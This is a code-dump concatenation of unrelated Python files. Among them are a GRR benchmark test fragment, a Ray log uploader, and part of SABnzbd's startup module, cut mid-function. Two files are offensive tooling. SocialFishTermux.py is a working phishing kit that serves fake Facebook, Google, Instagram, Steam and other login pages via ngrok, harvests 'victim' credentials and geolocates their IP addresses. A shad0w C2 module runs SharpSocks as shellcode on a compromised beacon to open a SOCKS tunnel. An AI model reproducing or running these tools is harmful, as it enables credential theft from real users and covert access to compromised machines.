self.assertEqual(cl.Get(cl.Schema.HOSTNAME), "client1")
# Collect exceptions in threads.
self.fails = []
def Thread():
try:
# Using blocking_lock_timeout of 10 minutes to avoid possible
# timeouts when running tests on slow hardware.
with aff4.FACTORY.OpenWithLock(
self.client_id,
token=self.token,
blocking=True,
blocking_sleep_interval=0.2,
blocking_lock_timeout=600) as client:
self.assertEqual(client.Get(client.Schema.HOSTNAME), "client1")
except Exception as e: # pylint: disable=broad-except
self.fails.append(e)
start_time = time.time()
for _ in xrange(self.n):
Thread()
end_time = time.time()
self.AddResult("OpenWithLock", (end_time - start_time) / self.n, self.n)
self.assertEqual(len(self.fails), 0)
start_time = time.time()
for _ in xrange(self.n):
self.tp.AddTask(Thread, ())
self.tp.Join()
end_time = time.time()
self.AddResult("Multithreaded: OpenWithLock",
(end_time - start_time) / self.n, self.n)
self.assertEqual(len(self.fails), 0)
|
SocialFishTermux.py
|
#!/usr/bin/python3
#-*- coding: utf-8 -*-
# SOCIALFISH v2.0
# by: An0nUD4Y
#
###########################
from time import sleep
from sys import stdout, exit
from os import system, path
from distutils.dir_util import copy_tree
import multiprocessing
from urllib.request import urlopen, quote, unquote
from platform import system as systemos, architecture
from wget import download
import re
import json
RED, WHITE, CYAN, GREEN, END = '\033[91m', '\33[46m', '\033[36m', '\033[1;32m', '\033[0m'
def connected(host='http://duckduckgo.com'):
try:
urlopen(host)
return True
except:
return False
if connected() == False:
print ('''
....._____....... ____ ____ ____ _ ____ _ ____ _ ____ _ _
/ \/| [__ | | | | |__| | |___ | [__ |__|
\o__ /\| ___] |__| |___ | | | |___ | | ___] | |
\|
{0}[{1}!{0}]{1} Network error. Verify your connection.\n
'''.format(RED, END))
exit(0)
def checkNgrok():
if path.isfile('Server/ngrok') == False:
print ('[*] Downloading Ngrok...')
if architecture()[0] == '64bit':
filename = 'ngrok-stable-linux-arm.zip'
else:
filename = 'ngrok-stable-linux-arm.zip'
url = 'https://bin.equinox.io/c/4VmDzA7iaHb/' + filename
download(url)
system('unzip ' + filename)
system('mv ngrok Server/ngrok')
system('rm -Rf ' + filename)
system('clear')
checkNgrok()
def end():
system('clear')
print ('''
S O C I A L{2}
|\ \ \ \ \ \ \ \ __ ___
| \ \ \ \ \ \ \ \ | O~-_ _-~~ ~~-_
| >----|-|-|-|-|-|-|--| __/ / {1}DON'T{2} )
| / / / / / / / / |__\ < {1}FORGET{2} )
|/ / / / / / / / \_ {1}ME !{2} _)
{1}F I S H{2} ~--___--~
{0}NOW WITH LIVE VICTIM ATTACK INFORMATION ]
{1}[ {0} Some more phising pages have been added in script. For a better Attack]
[ {0} Work Done By------------------------> An0nUD4Y]\n'''.format(GREEN, END, CYAN))
def loadModule(module):
print ('''{0}
_.-=-._ .-,
.' "-.,' /
( AnonUD4Y _. <
`=.____.=" `._\\
[{1}*{0}]{1} %s module loaded. Building site...{0}'''.format(CYAN, END) % module)
def runPhishing(social, option2):
system('rm -Rf Server/www/*.* && touch Server/www/usernames.txt && touch Server/www/ip.txt && cp WebPages/ip.php Server/www/')
if option2 == '1' and social == 'Facebook':
copy_tree("WebPages/fb_standard/", "Server/www/")
if option2 == '2' and social == 'Facebook':
copy_tree("WebPages/fb_advanced_poll/", "Server/www/")
if option2 == '3' and social == 'Facebook':
copy_tree("WebPages/fb_security_fake/", "Server/www/")
if option2 == '4' and social == 'Facebook':
copy_tree("WebPages/fb_messenger/", "Server/www/")
elif option2 == '1' and social == 'Google':
copy_tree("WebPages/google_standard/", "Server/www/")
elif option2 == '2' and social == 'Google':
copy_tree("WebPages/google_advanced_poll/", "Server/www/")
elif option2 == '3' and social == 'Google':
copy_tree("WebPages/google_advanced_web/", "Server/www/")
elif social == 'LinkedIn':
copy_tree("WebPages/linkedin/", "Server/www/")
elif social == 'GitHub':
copy_tree("WebPages/GitHub/", "Server/www/")
elif social == 'StackOverflow':
copy_tree("WebPages/stackoverflow/", "Server/www/")
elif social == 'WordPress':
copy_tree("WebPages/wordpress/", "Server/www/")
elif social == 'Twitter':
copy_tree("WebPages/twitter/", "Server/www/")
elif social == 'Snapchat':
copy_tree("WebPages/Snapchat_web/", "Server/www/")
elif social == 'Yahoo':
copy_tree("WebPages/yahoo_web/", "Server/www/")
elif social == 'Twitch':
copy_tree("WebPages/twitch/", "Server/www/")
elif social == 'Microsoft':
copy_tree("WebPages/live_web/", "Server/www/")
elif social == 'Steam':
copy_tree("WebPages/steam/", "Server/www/")
elif option2 == '1' and social == 'Instagram':
copy_tree("WebPages/Instagram_web/", "Server/www/")
elif option2 == '2' and social == 'Instagram':
copy_tree("WebPages/Instagram_autoliker/", "Server/www/")
elif option2 == '1' and social == 'VK':
copy_tree("WebPages/VK/", "Server/www/")
elif option2 == '2' and social == 'VK':
copy_tree("WebPages/VK_poll_method/", "Server/www/")
def waitCreds():
print ("{0}[{1}*{0}]{1} Hi Hacker Everything has been completed.............. Start HAcking ".format(RED, END))
print ('''{0}
_.-=-._ .-,
.' "-.,' /
( AnonUD4Y_ ~.<
`=.____.=" `._\\
[{1}*{0}]{1} NOW YOU WILL GET YOUR VICTIM'S LIVE INFORMATION .
[{1}*{0}]{1} GET VICTIM'S IP ADDRESS, ISP, GEOLOCATION, CITY, COUNTRY, AND MANY MORE STUFF.{0}'''.format(CYAN, END))
print (" {0}[{1}*{0}]{1} Waiting for credentials & victim's info... \n".format(RED, END))
while True:
with open('Server/www/usernames.txt') as creds:
lines = creds.read().rstrip()
if len(lines) != 0:
print ('======================================================================'.format(RED, END))
print (' {0}[ CREDENTIALS FOUND ]{1}:\n {0}%s{1}'.format(GREEN, END) % lines)
system('rm -rf Server/www/usernames.txt && touch Server/www/usernames.txt')
print ('======================================================================'.format(RED, END))
print (' {0}***** HOPE YOU ARE ENJOYING. SO PLEASE MAKE IT MORE POPULAR *****{1}\n {0}{1}'.format(RED, END))
creds.close()
with open('Server/www/ip.txt') as creds:
lines = creds.read().rstrip()
if len(lines) != 0:
ip = re.match('Victim Public IP: (.*?)\n', lines).group(1)
resp = urlopen('https://ipinfo.io/%s/json' % ip)
ipinfo = json.loads(resp.read().decode(resp.info().get_param('charset') or 'utf-8'))
if 'bogon' in ipinfo:
print ('======================================================================'.format(RED, END))
print (' \n{0}[ VICTIM IP BOGUS ]{1}:\n {0}%s{1}'.format(GREEN, END) % lines)
else:
matchObj = re.match('^(.*?),(.*)$', ipinfo['loc'])
latitude = matchObj.group(1)
longitude = matchObj.group(2)
print ('======================================================================'.format(RED, END))
print (' \n{0}[ VICTIM INFO FOUND ]{1}:\n {0}%s{1}'.format(GREEN, END) % lines)
print (' \n{0}Longitude: %s \nLatitude: %s{1}'.format(GREEN, END) % (longitude, latitude))
print (' \n{0}ISP: %s \nCountry: %s{1}'.format(GREEN, END) % (ipinfo['org'], ipinfo['country']))
print (' \n{0}Region: %s \nCity: %s{1}'.format(GREEN, END) % (ipinfo['region'], ipinfo['city']))
system('rm -rf Server/www/ip.txt && touch Server/www/ip.txt')
print ('======================================================================'.format(RED, END))
creds.close()
def runPEnv():
system('clear')
print (''' {2}-{1} An0nUD4Y {2}|{1} An0nUD4Y {2}|{1} An0nUD4Y {2}- INDIA
. . .
. ' . ' '
' ' ' ' '
███████ ████████ ███████ ██ ███████ ██ ███████ ██ ███████ ██ ██
██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██
███████ ██ ██ ██ ██ ███████ ██ █████ ██ ███████ ███████
██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██
███████ ████████ ███████ ██ ██ ██ ███████ ██ ██ ███████ ██ ██
. ' '....' ..'. ' .
' . . ' ' ' {1}v2.0{2}
' . . . . . '. .' ' .
' ' '. ' {1}Updated_By--> AnonUD4Y_{2}
' {0}[ NOW WITH LIVE VICTIM ATTACK INFORMATION ]
' . '
'
{1}'''.format(GREEN, END, CYAN))
for i in range(101):
sleep(0.01)
stdout.write("\r{0}[{1}*{0}]{1} Preparing environment... %d%%".format(CYAN, END) % i)
stdout.flush()
print ("\n\n{0}[{1}*{0}]{1} Searching for PHP installation... ".format(CYAN, END))
if 256 != system('which php'):
print (" --{0}>{1} OK.".format(CYAN, END))
else:
print (" --{0}>{1} PHP NOT FOUND: \n {0}*{1} Please install PHP and run me again.http://www.php.net/".format(RED, END))
exit(0)
if input(" {0}[{1}!{0}]{1} Do you agree to use this tool for educational purposes only? (y/n)\n {2}SF-An0nUD4Y > {1}".format(RED, END, CYAN)).upper() != 'Y':
system('clear')
print ('\n[ {0}YOU ARE NOT AUTHORIZED TO USE THIS TOOL.YOU NEED A GOOD MIND AND SOUL TO BE ONE OF US. GET AWAY FROM HERE AND DO NOT COME BACK WITH SAME MOTIVE. GOOD BYE!{1} ]\n'.format(RED, END))
exit(0)
option = input("\nSelect an option:\n\n {0}[{1}1{0}]{1} Facebook\n\n {0}[{1}2{0}]{1} Google\n\n {0}[{1}3{0}]{1} LinkedIn\n\n {0}[{1}4{0}]{1} GitHub\n\n {0}[{1}5{0}]{1} StackOverflow\n\n {0}[{1}6{0}]{1} WordPress\n\n {0}[{1}7{0}]{1} Twitter\n\n {0}[{1}8{0}]{1} Instagram\n\n {0}[{1}9{0}]{1} Snapchat\n\n {0}[{1}10{0}]{1} Yahoo\n\n {0}[{1}11{0}]{1} Twitch\n\n {0}[{1}12{0}]{1} Microsoft\n\n {0}[{1}13{0}]{1} Steam\n\n {0}[{1}14{0}]{1} VK\n\n {0}[{1}----->{0}]{1} More Phising Scripts COMMING SOON ! STAY TUNED With An0nUD4Y !\n\n {0}SF-An0nUD4Y > {1}".format(CYAN, END))
if option == '1':
loadModule('Facebook')
option2 = input("\nOperation mode:\n\n {0}[{1}1{0}]{1} Standard Page Phishing\n\n {0}[{1}2{0}]{1} Advanced Phishing-Poll Ranking Method(Poll_mode/login_with)\n\n {0}[{1}3{0}]{1} Facebook Phishing- Fake Security issue(security_mode) \n\n {0}[{1}4{0}]{1} Facebook Phising-Messenger Credentials(messenger_mode) \n\n {0}[{1}----->{0}]{1} More Phising Scripts COMMING SOON ! STAY TUNED !\n\n {0}SF-An0nUD4Y > {1}".format(CYAN, END))
runPhishing('Facebook', option2)
elif option == '2':
loadModule('Google')
option2 = input("\nOperation mode:\n\n {0}[{1}1{0}]{1} Standard Page Phishing\n\n {0}[{1}2{0}]{1} Advanced Phishing(poll_mode/login_with)\n\n {0}[{1}3{0}]{1} New Google Web\n\n {0}[{1}----->{0}]{1} More Phising Scripts COMMING SOON ! STAY TUNED !\n\n {0}SF-An0nUD4Y > {1}".format(CYAN, END))
runPhishing('Google', option2)
elif option == '3':
loadModule('LinkedIn')
option2 = ''
runPhishing('LinkedIn', option2)
elif option == '4':
loadModule('GitHub')
option2 = ''
runPhishing('GitHub', option2)
elif option == '5':
loadModule('StackOverflow')
option2 = ''
runPhishing('StackOverflow', option2)
elif option == '6':
loadModule('WordPress')
option2 = ''
runPhishing('WordPress', option2)
elif option == '7':
loadModule('Twitter')
option2 = ''
runPhishing('Twitter', option2)
elif option == '8':
loadModule('Instagram')
option2 = input("\nOperation mode:\n\n {0}[{1}1{0}]{1} Standard Instagram Web Page Phishing\n\n {0}[{1}2{0}]{1} Instagram Autoliker Phising (After submit redirects to original autoliker)\n\n {0}[{1}------------->{0}]{1} More Phising Scripts COMMING SOON ! STAY TUNED ! \n\n {0}SF-An0nUD4Y > {1}".format(CYAN, END))
runPhishing('Instagram', option2)
elif option == '9':
loadModule('Snapchat')
option2 = ''
runPhishing('Snapchat', option2)
elif option == '10':
loadModule('Yahoo')
option2 = ''
runPhishing('Yahoo', option2)
elif option == '11':
loadModule('Twitch')
option2 = ''
runPhishing('Twitch', option2)
elif option == '12':
loadModule('Microsoft')
option2 = ''
runPhishing('Microsoft', option2)
elif option == '13':
loadModule('Steam')
option2 = ''
runPhishing('Steam', option2)
elif option == '14':
loadModule('VK')
option2 = input("\nOperation mode:\n\n {0}[{1}1{0}]{1} Standard VK Web Page Phishing\n\n {0}[{1}2{0}]{1} Advanced Phishing(poll_mode/login_with)\n\n {0}[{1}------------->{0}]{1} More Phising Scripts COMMING SOON ! STAY TUNED ! \n\n {0}SF-An0nUD4Y > {1}".format(CYAN, END))
runPhishing('VK', option2)
else:
exit(0)
def runNgrok():
system('./Server/ngrok http 1111 > /dev/null &')
sleep(10)
system('curl -s -N http://127.0.0.1:4040/status | grep "https://[a-z]*\.ngrok.io" -oh > ngrok.url')
url = open('ngrok.url', 'r')
print("\n {0}[{1}*{0}]{1} Ngrok URL: {2}".format(CYAN, END, GREEN) + url.read() + "{1}".format(CYAN, END, GREEN))
url.close()
def runServer():
system("cd Server/www/ && php -S 127.0.0.1:1111")
if __name__ == "__main__":
try:
runPEnv()
runNgrok()
multiprocessing.Process(target=runServer).start()
waitCreds()
except KeyboardInterrupt:
system('pkill -f ngrok')
end()
exit(0)
|
phase3_log_daemon.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# import needed libraries
import glob
import ray
import threading
import time
from google.cloud import storage # type: ignore
from builds.build_utilities import uploads_data_to_gcs_bucket # type: ignore
@ray.remote
class PKTLogUploader(object):
"""Implements a background task that uploads logs from a directory to a Google Cloud Storage Bucket while another
method, external to the class in run.
SOURCE: https://github.com/ray-project/ray/issues/854#issuecomment-499056709
Attributes:
bucket_name: A string specifying the name of a Google Cloud Storage bucket.
gcs_bucket_location: A string specifying the location of the original_data directory for a specific build.
log_directory: A local directory where preprocessed data is stored.
sleep_interval: An integer specifying how often logs should be pushed to the Google Cloud Storage Bucket.
"""
def __init__(self, bucket_name, gcs_bucket_location, log_directory, sleep_interval):
self.bucket: str = storage.Client().get_bucket(bucket_name)
self.gcs_bucket_location: str = gcs_bucket_location
self.log_directory: str = log_directory
self.sleep: int = sleep_interval
self.kill_time: int = 172800 # 48 hours
# START BACKGROUND PROCESS
self._thread: threading.Thread = threading.Thread(target=self._run, daemon=True)
self._thread.start()
def _run(self):
"""Method uploads any log files found in temp_directory from a local directory to a specific directory in a
Google Cloud Storage Bucket every "n" minutes as specified by the input interval variable. This method runs
the program it is called with finishes. There is also a back-up timer that will kill the program
Args:
bucket: A storage Bucket object specifying a Google Cloud Storage bucket.
original_data: A string specifying the location of the original_data directory for a specific build.
temp_directory: A local directory where preprocessed data is stored.
interval: An integer specifying how often the data should be pushed up to the Google Cloud Storage Bucket.
Returns:
None.
"""
# grep for log files in the log_directory
log_file = glob.glob(self.log_directory + '/*.log')[0].split('/')[-1]
runtime = 0
while runtime < self.kill_time:
uploads_data_to_gcs_bucket(self.bucket, self.gcs_bucket_location, self.log_directory, log_file)
time.sleep(self.sleep)
runtime += self.sleep
return None
|
sharpsocks.py
|
#
# Execute sharpsocks on a session
#
import os
import time
import argparse
import threading
from lib import shellcode
__description__ = "Create a SOCKS tunnel over HTTP/HTTPS\n"
__author__ = "@_batsec_, @rbmaslen"
__type__ = "module"
# identify the task as shellcode execute
USERCD_EXEC_ID = 0x3000
# should we execute sharpsocks on the target
EXEC_SHARPSOCKS = False
# globals for the arguments
ERROR = False
error_list = ""
# location of sharpsocks binary
sharpsocks_BIN = "/root/shad0w/bin/SharpSocks.x86.exe"
def error(message):
global ERROR, error_list
ERROR = True
error_list += f"\033[0;31m{message}\033[0m\n"
def exit(status=0, message=None):
if message != None: print(message)
return
def sharpsocks_callback(shad0w, data):
if shad0w.sharpsocks_verbose:
print(data)
return ""
def start_sharpsocks_server(http_listen=None, socks_listen=None, quick=True, cmd_line=None):
# modules directory
modules_dir = "/root/shad0w/modules/windows/sharpsocks/"
# binary name
bin_name = "SharpSocksServerCore"
# change to the modules directory
os.chdir(modules_dir)
# create the default cmd line
if quick == True:
cmd_line = f"-l http://{http_listen}"
cmd = f"./{bin_name} {cmd_line} > /tmp/sharpsocks.log"
# start the server
cmd = f"./{bin_name} {cmd_line} > /tmp/sharpsocks.log"
os.popen(cmd)
try:
os.unlink("/tmp/sharpsocks.log")
except:
pass
data = ""
for _ in range(0, 5):
try:
with open("/tmp/sharpsocks.log", "r") as file:
data = file.read()
except:
time.sleep(0.5)
if len(data) == 0:
return None
if quick == False:
print(data)
return None
for line in data.splitlines():
if "Using encryption key" in line:
line = line.split()
key = line[len(line) - 1]
return key
def kill_server():
os.popen("killall -9 SharpSocksServe")
return
def await_for_socks_start(shad0w):
while True:
try:
with open("/tmp/sharpsocks.log", "r") as file:
data = file.read()
if "Socks proxy listening started" in data:
client_ip = shad0w.beacons[shad0w.current_beacon]["ip_addr"]
shad0w.debug.good(f"Socks started ({shad0w.endpoint}:43334 <==> {client_ip})")
break
except FileNotFoundError: pass
return
def main(shad0w, args):
global EXEC_SHARPSOCKS
# check we actually have a beacon
if shad0w.current_beacon is None:
shad0w.debug.log("ERROR: No active beacon.", log=True)
return
# save the raw args
raw_args = args
# usage examples
usage_examples = """
Examples:
sharpsocks -q
sharpsocks --kill
sharpsocks server -l http://*:http-port-to-bind -s *:socks-port-to-bind
sharpsocks client -s http://your.redirector:port/ -k key
"""
parse = argparse.ArgumentParser(prog='sharpsocks',
formatter_class=argparse.RawDescriptionHelpFormatter,
epilog=usage_examples)
# keep argparse behaving nice
parse.exit = exit
parse.error = error
parse.add_argument("server", help="Control the SharpSocks server")
parse.add_argument("client", help="Control the SharpSocks client")
parse.add_argument("-q", "--quick", action='store_true', help="Create a socks tunnel between the C2 and the client")
parse.add_argument("-v", "--verbose", action='store_true', help="Verbose output")
parse.add_argument("--kill", action='store_true', help="Kill the socks tunnel")
# make sure we don't die from weird args
try:
args = parse.parse_args(args[1:])
except:
pass
# make sure we have an argument
if len(raw_args) == 1:
parse.print_help()
return
shad0w.sharpsocks_verbose = False
if args.verbose:
shad0w.sharpsocks_verbose = True
if args.kill:
kill_server()
return
if args.quick:
http_listen_addr = f"*:8080"
key = start_sharpsocks_server(http_listen=http_listen_addr)
if key == None:
print("Failed to start the server.")
return
threading.Thread(target=await_for_socks_start, args=(shad0w,)).start()
sharpsocks_cmd_line = f"-s http://{shad0w.endpoint} -k {key}"
args.param = sharpsocks_cmd_line
EXEC_SHARPSOCKS = True
if args.server == "server":
cmdline = ' '.join(raw_args[2:])
start_sharpsocks_server(quick=False, cmd_line=cmdline)
return
if args.server == "client":
args.param = ' '.join(raw_args[2:])
EXEC_SHARPSOCKS = True
if EXEC_SHARPSOCKS:
args.cls = False
args.method = False
args.runtime = False
args.appdomain = False
b64_comp_data = shellcode.generate(sharpsocks_BIN, args, args.param)
shad0w.beacons[shad0w.current_beacon]["task"] = (USERCD_EXEC_ID, b64_comp_data)
shad0w.beacons[shad0w.current_beacon]["callback"] = sharpsocks_callback
|
__init__.py
|
#!/usr/bin/python3 -OO
# Copyright 2007-2020 The SABnzbd-Team <team@sabnzbd.org>
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 2
# of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
# Imported to be referenced from other files directly
from sabnzbd.version import __version__, __baseline__
import os
import logging
import datetime
import tempfile
import pickle
import gzip
import subprocess
import time
import socket
import cherrypy
import sys
import re
import ssl
from threading import Lock, Thread
##############################################################################
# Determine platform flags
##############################################################################
WIN32 = DARWIN = FOUNDATION = WIN64 = DOCKER = False
KERNEL32 = None
if os.name == "nt":
WIN32 = True
from sabnzbd.utils.apireg import del_connection_info
try:
import ctypes
KERNEL32 = ctypes.windll.LoadLibrary("Kernel32.dll")
except:
pass
elif os.name == "posix":
ORG_UMASK = os.umask(18)
os.umask(ORG_UMASK)
# Check if running in a Docker container
try:
with open("/proc/1/cgroup", "rt") as ifh:
DOCKER = ":/docker/" in ifh.read()
except:
pass
import platform
if platform.system().lower() == "darwin":
DARWIN = True
# 12 = Sierra, 11 = ElCaptain, 10 = Yosemite, 9 = Mavericks, 8 = MountainLion
DARWIN_VERSION = int(platform.mac_ver()[0].split(".")[1])
try:
import Foundation
import sabnzbd.utils.sleepless as sleepless
FOUNDATION = True
except:
pass
# Now we can import safely
from sabnzbd.nzbqueue import NzbQueue
from sabnzbd.postproc import PostProcessor
from sabnzbd.downloader import Downloader
from sabnzbd.decoder import Decoder
from sabnzbd.assembler import Assembler
from sabnzbd.rating import Rating
import sabnzbd.misc as misc
import sabnzbd.filesystem as filesystem
import sabnzbd.powersup as powersup
from sabnzbd.dirscanner import DirScanner
from sabnzbd.urlgrabber import URLGrabber
import sabnzbd.scheduler as scheduler
import sabnzbd.rss as rss
import sabnzbd.emailer as emailer
from sabnzbd.articlecache import ArticleCache
import sabnzbd.newsunpack
import sabnzbd.encoding as encoding
import sabnzbd.config as config
from sabnzbd.bpsmeter import BPSMeter
import sabnzbd.cfg as cfg
import sabnzbd.database
import sabnzbd.lang as lang
import sabnzbd.par2file as par2file
import sabnzbd.nzbparser as nzbparser
import sabnzbd.api
import sabnzbd.interface
import sabnzbd.nzbstuff as nzbstuff
import sabnzbd.directunpacker as directunpacker
from sabnzbd.decorators import synchronized
from sabnzbd.constants import (
NORMAL_PRIORITY,
VALID_ARCHIVES,
REPAIR_REQUEST,
QUEUE_FILE_NAME,
QUEUE_VERSION,
QUEUE_FILE_TMPL,
)
import sabnzbd.getipaddress as getipaddress
LINUX_POWER = powersup.HAVE_DBUS
START = datetime.datetime.now()
MY_NAME = None
MY_FULLNAME = None
RESTART_ARGS = []
NEW_VERSION = (None, None)
DIR_HOME = None
DIR_APPDATA = None
DIR_LCLDATA = None
DIR_PROG = None
DIR_INTERFACES = None
DIR_LANGUAGE = None
DIR_PID = None
QUEUECOMPLETE = None # stores the nice name of the action
QUEUECOMPLETEACTION = None # stores the name of the function to be called
QUEUECOMPLETEARG = None # stores an extra arguments that need to be passed
DAEMON = None
LOGFILE = None
WEBLOGFILE = None
LOGHANDLER = None
GUIHANDLER = None
LOG_ALL = False
AMBI_LOCALHOST = False
WIN_SERVICE = None # Instance of our Win32 Service Class
BROWSER_URL = None
CERTIFICATE_VALIDATION = True
NO_DOWNLOADING = False # When essentials are missing (SABYenc/par2/unrar)
WEB_DIR = None
WEB_DIR_CONFIG = None
WIZARD_DIR = None
WEB_COLOR = None
SABSTOP = False
RESTART_REQ = False
PAUSED_ALL = False
TRIGGER_RESTART = False # To trigger restart for Scheduler, WinService and Mac
WINTRAY = None # Thread for the Windows SysTray icon
WEBUI_READY = False
LAST_WARNING = None
LAST_ERROR = None
EXTERNAL_IPV6 = False
LAST_HISTORY_UPDATE = 1
# Performance measure for dashboard
PYSTONE_SCORE = 0
DOWNLOAD_DIR_SPEED = 0
COMPLETE_DIR_SPEED = 0
INTERNET_BANDWIDTH = 0
# Rendering of original command line arguments in Config
CMDLINE = " ".join(['"%s"' % arg for arg in sys.argv])
__INITIALIZED__ = False
__SHUTTING_DOWN__ = False
##############################################################################
# Signal Handler
##############################################################################
def sig_handler(signum=None, frame=None):
global SABSTOP, WINTRAY
if sabnzbd.WIN32 and signum is not None and DAEMON and signum == 5:
# Ignore the "logoff" event when running as a Win32 daemon
return True
if signum is not None:
logging.warning(T("Signal %s caught, saving and exiting..."), signum)
try:
save_state()
sabnzbd.zconfig.remove_server()
finally:
if sabnzbd.WIN32:
del_connection_info()
if sabnzbd.WINTRAY:
sabnzbd.WINTRAY.terminate = True
time.sleep(0.5)
else:
pid_file()
SABSTOP = True
os._exit(0)
##############################################################################
# Initializing
##############################################################################
INIT_LOCK = Lock()
def get_db_connection(thread_index=0):
# Create a connection and store it in the current thread
if not (hasattr(cherrypy.thread_data, "history_db") and cherrypy.thread_data.history_db):
cherrypy.thread_data.history_db = sabnzbd.database.HistoryDB()
return cherrypy.thread_data.history_db
@synchronized(INIT_LOCK)
def initialize(pause_downloader=False, clean_up=False, evalSched=False, repair=0):
global __INITIALIZED__, __SHUTTING_DOWN__, LOGFILE, WEBLOGFILE, LOGHANDLER, GUIHANDLER, AMBI_LOCALHOST, WAITEXIT, DAEMON, MY_NAME, MY_FULLNAME, NEW_VERSION, DIR_HOME, DIR_APPDATA, DIR_LCLDATA, DIR_PROG, DIR_INTERFACES, DARWIN, RESTART_REQ
if __INITIALIZED__:
return False
__SHUTTING_DOWN__ = False
# Set global database connection for Web-UI threads
cherrypy.engine.subscribe("start_thread", get_db_connection)
# Paused?
pause_downloader = pause_downloader or cfg.start_paused()
# Clean-up, if requested
if clean_up:
# New admin folder
filesystem.remove_all(cfg.admin_dir.get_path(), "*.sab")
# Optionally wait for "incomplete" to become online
if cfg.wait_for_dfolder():
wait_for_download_folder()
else:
cfg.download_dir.set(cfg.download_dir(), create=True)
cfg.download_dir.set_create(True)
# Set access rights for "incomplete" base folder
filesystem.set_permissions(cfg.download_dir.get_path(), recursive=False)
# If dirscan_dir cannot be created, set a proper value anyway.
# Maybe it's a network path that's temporarily missing.
path = cfg.dirscan_dir.get_path()
if not os.path.exists(path):
filesystem.create_real_path(cfg.dirscan_dir.ident(), "", path, False)
# Set call backs for Config items
cfg.cache_limit.callback(new_limit)
cfg.cherryhost.callback(guard_restart)
cfg.cherryport.callback(guard_restart)
cfg.web_dir.callback(guard_restart)
cfg.web_color.callback(guard_restart)
cfg.username.callback(guard_restart)
cfg.password.callback(guard_restart)
cfg.log_dir.callback(guard_restart)
cfg.https_port.callback(guard_restart)
cfg.https_cert.callback(guard_restart)
cfg.https_key.callback(guard_restart)
cfg.enable_https.callback(guard_restart)
cfg.top_only.callback(guard_top_only)
cfg.pause_on_post_processing.callback(guard_pause_on_pp)
cfg.quota_size.callback(guard_quota_size)
cfg.quota_day.callback(guard_quota_dp)
cfg.quota_period.callback(guard_quota_dp)
cfg.language.callback(guard_language)
cfg.enable_https_verification.callback(guard_https_ver)
guard_https_ver()
# Set cache limit
if not cfg.cache_limit() or (cfg.cache_limit() in ("200M", "450M") and (sabnzbd.WIN32 or sabnzbd.DARWIN)):
cfg.cache_limit.set(misc.get_cache_limit())
ArticleCache.do.new_limit(cfg.cache_limit.get_int())
check_incomplete_vs_complete()
# Set language files
lang.set_locale_info("SABnzbd", DIR_LANGUAGE)
lang.set_language(cfg.language())
sabnzbd.api.clear_trans_cache()
sabnzbd.change_queue_complete_action(cfg.queue_complete(), new=False)
# One time conversion "speedlimit" in schedules.
if not cfg.sched_converted():
schedules = cfg.schedules()
newsched = []
for sched in schedules:
if "speedlimit" in sched:
newsched.append(re.sub(r"(speedlimit \d+)$", r"\1K", sched))
else:
newsched.append(sched)
cfg.schedules.set(newsched)
cfg.sched_converted.set(1)
# Second time schedule conversion
if cfg.sched_converted() != 2:
cfg.schedules.set(["%s %s" % (1, schedule) for schedule in cfg.schedules()])
cfg.sched_converted.set(2)
config.save_config()
# Convert auto-sort
if cfg.auto_sort() == "0":
cfg.auto_sort.set("")
elif cfg.auto_sort() == "1":
cfg.auto_sort.set("avg_age asc")
# Add hostname to the whitelist
if not cfg.host_whitelist():
cfg.host_whitelist.set(socket.gethostname())
# Do repair if requested
if check_repair_request():
repair = 2
pause_downloader = True
# Initialize threads
rss.init()
paused = BPSMeter.do.read()
NzbQueue()
Downloader(pause_downloader or paused)
Decoder()
Assembler()
PostProcessor()
NzbQueue.do.read_queue(repair)
DirScanner()
Rating()
URLGrabber()
scheduler.init()
if evalSched:
scheduler.analyse(pause_downloader)
logging.info("All processes started")
RESTART_REQ = False
__INITIALIZED__ = True
return True
@synchronized(INIT_LOCK)
def start():
global __INITIALIZED__
if __INITIALIZED__:
logging.debug("Starting postprocessor")
PostProcessor.do.start()
logging.debug("Starting assembler")
Assembler.do.start()
logging.debug("Starting downloader")
Downloader.do.start()
logging.debug("Starting decoders")
Decoder.do.start()
scheduler.start()
logging.debug("Starting dirscanner")
DirScanner.do.start()
Rating.do.start()
logging.debug("Starting urlgrabber")
URLGrabber.do.start()
@synchronized(INIT_LOCK)
def halt():
global __INITIALIZED__, __SHUTTING_DOWN__
if __INITIALIZED__:
logging.info("SABnzbd shutting down...")
__SHUTTING_DOWN__ = True
# Stop the windows tray icon
if sabnzbd.WINTRAY:
sabnzbd.WINTRAY.terminate = True
sabnzbd.zconfig.remove_server()
sabnzbd.directunpacker.abort_all()
rss.stop()
logging.debug("Stopping URLGrabber")
URLGrabber.do.stop()
try:
URLGrabber.do.join()
except:
pass
logging.debug("Stopping rating")
Rating.do.stop()
try:
Rating.do.join()
except:
pass
logging.debug("Stopping dirscanner")
DirScanner.do.stop()
try:
DirScanner.do.join()
except:
pass
# Stop Required Objects
logging.debug("Stopping downloader")
sabnzbd.downloader.stop()
# Decoder handles join gracefully
logging.debug("Stopping decoders")
Decoder.do.stop()
Decoder.do.join()
logging.debug("Stopping assembler")
Assembler.do.stop()
try:
Assembler.do.join()
except:
pass
logging.debug("Stopping postprocessor")
PostProcessor.do.stop()
try:
PostProcessor.do.join()
except:
pass
# Save State
try:
save_state()
except:
logging.error(T("Fatal error at saving state"), exc_info=True)
# The Scheduler cannot be stopped when the stop was scheduled.
# Since all warm-restarts have been removed, it's not longer
# needed to stop the scheduler.
# We must tell the scheduler to deactivate.
scheduler.abort()
logging.info("All processes stopped")
__INITIALIZED__ = False
def trigger_restart(timeout=None):
""" Trigger a restart by setting a flag an shutting down CP """
# Sometimes we need to wait a bit to send good-bye to the browser
if timeout:
time.sleep(timeout)
# Add extra arguments
if sabnzbd.downloader.Downloader.do.paused:
sabnzbd.RESTART_ARGS.append("-p")
sys.argv = sabnzbd.RESTART_ARGS
# Stop all services
sabnzbd.halt()
cherrypy.engine.exit()
if sabnzbd.WIN32:
